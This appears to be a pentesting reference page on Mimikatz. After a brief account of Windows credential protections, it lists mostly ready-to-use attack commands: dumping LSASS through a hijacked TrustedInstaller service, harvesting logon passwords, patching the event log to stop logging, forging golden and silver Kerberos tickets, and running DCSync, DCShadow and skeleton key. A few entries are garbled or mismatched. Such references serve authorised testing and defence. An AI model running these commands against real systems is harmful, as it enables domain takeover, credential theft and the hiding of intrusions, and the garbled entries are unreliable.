Search K
Appearance
Appearance
This page is based on one from adsecurity.org. Check the original for further info!
From Windows 8.1 and Windows Server 2012 R2 onwards, significant measures have been implemented to safeguard against credential theft:
LM hashes and plain-text passwords are no longer stored in memory to enhance security. A specific registry setting, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" must be configured with a DWORD value of 0
to disable Digest Authentication, ensuring "clear-text" passwords are not cached in LSASS.
LSA Protection is introduced to shield the Local Security Authority (LSA) process from unauthorized memory reading and code injection. This is achieved by marking the LSASS as a protected process. Activation of LSA Protection involves:
RunAsPPL
to dword:00000001
.Despite these protections, tools like Mimikatz can circumvent LSA Protection using specific drivers, although such actions are likely to be recorded in event logs.
Administrators typically have SeDebugPrivilege, enabling them to debug programs. This privilege can be restricted to prevent unauthorized memory dumps, a common technique used by attackers to extract credentials from memory. However, even with this privilege removed, the TrustedInstaller account can still perform memory dumps using a customized service configuration:
sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
sc start TrustedInstaller
This allows the dumping of the lsass.exe
memory to a file, which can then be analyzed on another system to extract credentials:
# privilege::debug
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords
Event log tampering in Mimikatz involves two primary actions: clearing event logs and patching the Event service to prevent logging of new events. Below are the commands for performing these actions:
Command: event::drop
This experimental command is designed to modify the Event Logging Service's behavior, effectively preventing it from recording new events.
Example: mimikatz "privilege::debug" "event::drop" exit
The privilege::debug
command ensures that Mimikatz operates with the necessary privileges to modify system services.
The event::drop
command then patches the Event Logging service.
A Golden Ticket allows for domain-wide access impersonation. Key command and parameters:
kerberos::golden
/domain
: The domain name./sid
: The domain's Security Identifier (SID)./user
: The username to impersonate./krbtgt
: The NTLM hash of the domain's KDC service account./ptt
: Directly injects the ticket into memory./ticket
: Saves the ticket for later use.Example:
mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
Silver Tickets grant access to specific services. Key command and parameters:
/service
: The service to target (e.g., cifs, http).Example:
mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit
Trust Tickets are used for accessing resources across domains by leveraging trust relationships. Key command and parameters:
/target
: The target domain's FQDN./rc4
: The NTLM hash for the trust account.Example:
mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit
Listing Tickets:
kerberos::list
Pass the Cache:
kerberos::ptc
mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Pass the Ticket:
kerberos::ptt
mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Purge Tickets:
kerberos::purge
DCShadow: Temporarily make a machine act as a DC for AD object manipulation.
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: Mimic a DC to request password data.
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
LSADUMP::LSA: Extract credentials from LSA.
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: Impersonate a DC using a computer account's password data.
LSADUMP::SAM: Access local SAM database.
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: Decrypt secrets stored in the registry.
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: Set a new NTLM hash for a user.
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: Retrieve trust authentication information.
mimikatz "lsadump::trust" exit
mimikatz "privilege::debug" "misc::skeleton" exit
PRIVILEGE::Backup: Acquire backup rights.
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: Obtain debug privileges.
mimikatz "privilege::debug" exit
SEKURLSA::LogonPasswords: Show credentials for logged-on users.
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: Extract Kerberos tickets from memory.
mimikatz "sekurlsa::tickets /export" exit
SID::add/modify: Change SID and SIDHistory.
mimikatz "sid::add /user:targetUser /sid:newSid" exit
TOKEN::Elevate: Impersonate tokens.
mimikatz "token::elevate /domainadmin" exit
TS::MultiRDP: Allow multiple RDP sessions.
mimikatz "ts::multirdp" exit
TS::Sessions: List TS/RDP sessions.
mimikatz "vault::cred /patch" exit